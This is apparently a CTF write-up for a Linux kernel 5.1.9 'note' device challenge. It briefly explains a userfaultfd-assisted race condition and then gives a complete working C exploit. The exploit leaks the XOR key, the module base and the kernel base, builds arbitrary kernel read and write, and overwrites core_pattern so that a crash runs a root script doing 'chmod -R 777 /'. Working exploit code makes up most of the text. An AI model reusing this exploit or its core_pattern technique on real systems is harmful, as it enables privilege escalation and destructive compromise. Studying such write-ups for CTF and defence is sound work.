Problem

Environment

  • kernel version: 5.1.9

Features

This challenge provide note misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.

And the struct enc_data (stored data) and struct request_t is following:

typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

typedef struct enc_data_t {
  uint64_t xor_key;
  uint64_t size;
  uint64_t data_addr_minus_page_offset_base;
  char enc_data[0]; // Struct Hack; see https://www.geeksforgeeks.org/struct-hack/
} enc_data_t;

Vulnerability

Since unlocked_ioctl does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.

Consider following sequence:

    sequenceDiagram
	    participant user
	    participant device
	    participant userfaultfd
	    
	    user->>device: store_data(idx <- 0)
	    note over device: [0x00] enc_data(key=?,len=0x10,data=0x18) @ idx=0
	    device->>userfaultfd: request: copy_from_user
	    userfaultfd->>device: request: reset
	    note over device: [0x00] NULL
	    userfaultfd->>device: request: store_data(idx <- 0)
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    userfaultfd->>device: request: store_data(idx <- 1)
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    note over device: [0x18] enc_data(key=?,len=0,data=0x30) @ idx=1
	    userfaultfd->>device: response: data of copy_from_user = {0x11111111, 0x22222222, 0x33333333}
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    note over device: [0x18] enc_data(key=0x11111111,len=0x22222222,data=0x33333333) @ idx=1
	    user->>device: get_data(idx=1)

As see above, we can control xor_key and size, data_addr_minus_page_offset_base of enc_data_t. Then we can leak xor_key(leak_xor_key) and data_addr_minus_page_offset_base(leak_vuln_dev_minus_page_offset_base), device(module)_base(leak_vuln_dev_base), page_offset_base(vuln_dev_base - vuln_dev_base_minus_page_offset_base), kernel_base(leak_kernel_base) step by step.

As the device provide read and update features, we can make AAR & AAW primitives using these features on modified enc_data.

Exploit

      #define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#define VULN_DEV_NAME "note"
#define VULN_DEV_CMD_ADD 0xffffff00
#define VULN_DEV_CMD_UPDATE 0xffffff01
#define VULN_DEV_CMD_GET 0xffffff02
#define VULN_DEV_CMD_RESET 0xffffff03
#define VULN_DEV_BASE 0xffffffffc0000000
#define VULN_DEV_MISC_FILE_OPS_OFFSET (0xffffffffc0002060 - VULN_DEV_BASE)
#define VULN_DEV_MISC_FILE_OPS_UNLOCKED_IOCTL_IDX 10
#define VULN_DEV_MISC_FILE_OPS_FLUSH_IDX 14
#define VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE \
  (0xffffffffc00021f8 - VULN_DEV_BASE)

#define KERNEL_BASE 0xffffffff81000000
#define OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV \
  (0xffffffff810a8fa0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff8210dbe0 - KERNEL_BASE)

static void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}
static void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  pthread_t th;
  int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    fatal("syscall(__NR_userfaultfd)");
  }

  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
    fatal("ioctl(UFFDIO_API)");
  }

  uffdio_register.range.start = (uint64_t)addr;
  uffdio_register.range.len = len;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
    fatal("ioctl(UFFDIO_REGISTER)");
  }

  if (pthread_create(&th, NULL, handler, (void*)(uint64_t)uffd) < 0) {
    fatal("pthread_create");
  }

  return uffd;
}

cpu_set_t target_cpu;
static int vuln_dev_fd;
uint64_t vuln_dev_xor_key;
uint64_t vuln_dev_base_minus_page_offset_base;
uint64_t vuln_dev_base;

uint64_t page_offset_base;
uint64_t kernel_base;

typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

static int vuln_dev_add(uint8_t size, void* data) {
  request_t req = {
      .idx = 0,
      .size = size,
      .data = (uint64_t)data,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_ADD, &req);
}
static int vuln_dev_update(uint64_t idx, void* buf) {
  request_t req = {
      .idx = idx,
      .size = 0,
      .data = (uint64_t)buf,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_UPDATE, &req);
}
static int vuln_dev_get(uint64_t idx, void* buf) {
  request_t req = {
      .idx = idx,
      .size = 0,
      .data = (uint64_t)buf,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &req);
}
static int vuln_dev_reset() {
  request_t req = {
      .idx = 0,
      .size = 0,
      .data = 0,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_RESET, &req);
}

// funtions for leaking xor_key

int leaked_xor_key_bytes = 0;
static void* userfault_handler_for_leak_xor_key(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(leaked_xor_key_bytes, page);
    vuln_dev_add(0xff, page);

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

static uint64_t leak_xor_key() {
  char buf[0x100] = {
      0,
  };
  uint64_t tmp_xor_key = 0;

  for (int i = 0; i < 8; ++i) {
    void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (uffd_page == MAP_FAILED) {
      fatal("mmap");
    }
    register_uffd(uffd_page, 0x1000, userfault_handler_for_leak_xor_key);

    vuln_dev_add(0x10, uffd_page);

    memset(buf, 'a', sizeof(buf));
    vuln_dev_get(1, buf);
    int idx_61 = -1;
    for (int i = 0; i < 0x100; ++i) {
      if (buf[i] == 0x61 && idx_61 == -1) {
        idx_61 = i;
      }
    }
    if (idx_61 == -1) {
      fatal("leak_xor_key: idx_61 == -1");
    }

    tmp_xor_key |= ((uint64_t)idx_61) << (i * 8);

    vuln_dev_reset();
    munmap(uffd_page, 0x1000);
    ++leaked_xor_key_bytes;
  }

  return tmp_xor_key;
}

// funtions for leaking vuln_dev_base - page_offset_base

static void* userfault_handler_for_vuln_dev_base_minus_page_offset_base(
    void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 8) = 0x18 ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

static uint64_t leak_vuln_dev_minus_page_offset_base() {
  char buf[0x100] = {
      0,
  };

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000,
                userfault_handler_for_vuln_dev_base_minus_page_offset_base);

  vuln_dev_reset();
  vuln_dev_add(0x10, uffd_page);
  vuln_dev_get(1, buf);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);

  uint64_t vuln_dev_base_minus_page_offset_base = *(uint64_t*)(buf + 0x10);
  return vuln_dev_base_minus_page_offset_base - 0x2568;
}

// functions for leaking vuln_dev_base

static void* userfault_handler_for_vuln_dev_base(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = 0x18 ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (vuln_dev_base_minus_page_offset_base + VULN_DEV_MISC_FILE_OPS_OFFSET +
         8 * VULN_DEV_MISC_FILE_OPS_FLUSH_IDX) ^
        vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

static uint64_t leak_vuln_dev_base() {
  char buf[0x100] = {
      0,
  };

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base);

  vuln_dev_reset();
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_get(1, buf);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);

  uint64_t tmp_vuln_dev_base = *(uint64_t*)(buf);
  return tmp_vuln_dev_base;
}

// functions for aar

uint64_t aar_addr;
size_t aar_size;
static void* userfault_handler_for_aar(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = aar_size ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (aar_addr - page_offset_base) ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

static void aar(void* out, uint64_t addr, uint64_t size) {
  if (size >= 0x100) {
    fatal("aar: size >= 0x100");
  }

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_aar);

  aar_addr = addr;
  aar_size = size;

  vuln_dev_reset();
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_get(1, out);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);
}

// functions for aar

uint64_t aaw_addr;
size_t aaw_size;
static void* userfault_handler_for_aaw(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = aaw_size ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (aaw_addr - page_offset_base) ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

static void aaw(uint64_t addr, void* data, uint64_t size) {
  if (size >= 0x100) {
    fatal("aar: size >= 0x100");
  }

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_aaw);

  aaw_addr = addr;
  aaw_size = size;

  vuln_dev_reset();
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_update(1, data);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);
}

static uint64_t leak_kernel_base() {
  uint64_t val;
  aar(&val, vuln_dev_base + VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE, 8);
  aar(&val, val, 8);
  return val - OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV;
}

// end of helper functions

static int overwrite_core_pattern(const char* new_core_pattern, size_t len) {
  aaw(kernel_base + CORE_PATTERN_OFFSET, (void*)new_core_pattern, len);

  int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  char buf[0x100] = {
      0,
  };
  read(fd, buf, 0x100);
  close(fd);

  if (strncmp(buf, new_core_pattern, len) != 0) {
    return -1;
  }
  return 0;
}

int main() {
  CPU_ZERO(&target_cpu);
  CPU_SET(0, &target_cpu);
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  vuln_dev_fd = open("/dev/" VULN_DEV_NAME, O_RDONLY);
  if (vuln_dev_fd < 0) {
    fatal("open(/dev/" VULN_DEV_NAME ")");
  }

  vuln_dev_xor_key = leak_xor_key();
  printf("[+] xor_key: 0x%lx\n", vuln_dev_xor_key);
  vuln_dev_base_minus_page_offset_base = leak_vuln_dev_minus_page_offset_base();
  printf("[+] vuln_dev_base_minus_page_offset_base: 0x%lx\n",
         vuln_dev_base_minus_page_offset_base);
  vuln_dev_base = leak_vuln_dev_base();
  printf("[+] vuln_dev_base: 0x%lx\n", vuln_dev_base);

  page_offset_base = vuln_dev_base - vuln_dev_base_minus_page_offset_base;
  printf("[+] page_offset_base: 0x%lx\n", page_offset_base);
  kernel_base = leak_kernel_base();
  printf("[+] kernel_base: 0x%lx\n", kernel_base);

  puts("[*] prepare for core_pattern");
  const char* new_core_pattern = "|//home/note/evil.sh";
  const size_t new_core_pattern_len = strlen(new_core_pattern);
  printf("[*] overwriting core_pattern to \"%s\"...\n", new_core_pattern);
  if (overwrite_core_pattern(new_core_pattern, new_core_pattern_len) < 0) {
    fatal("overwrite_core_pattern");
  }
  puts("[*] make //home/note/evil.sh...");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > //home/note/evil.sh");
  system("chmod +x //home/note/evil.sh");
  system("ulimit -c unlimited");

  uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe;
  *evil_ptr = 0xdeadbeefcafebebe;

  close(vuln_dev_fd);
  return 0;
}

Reference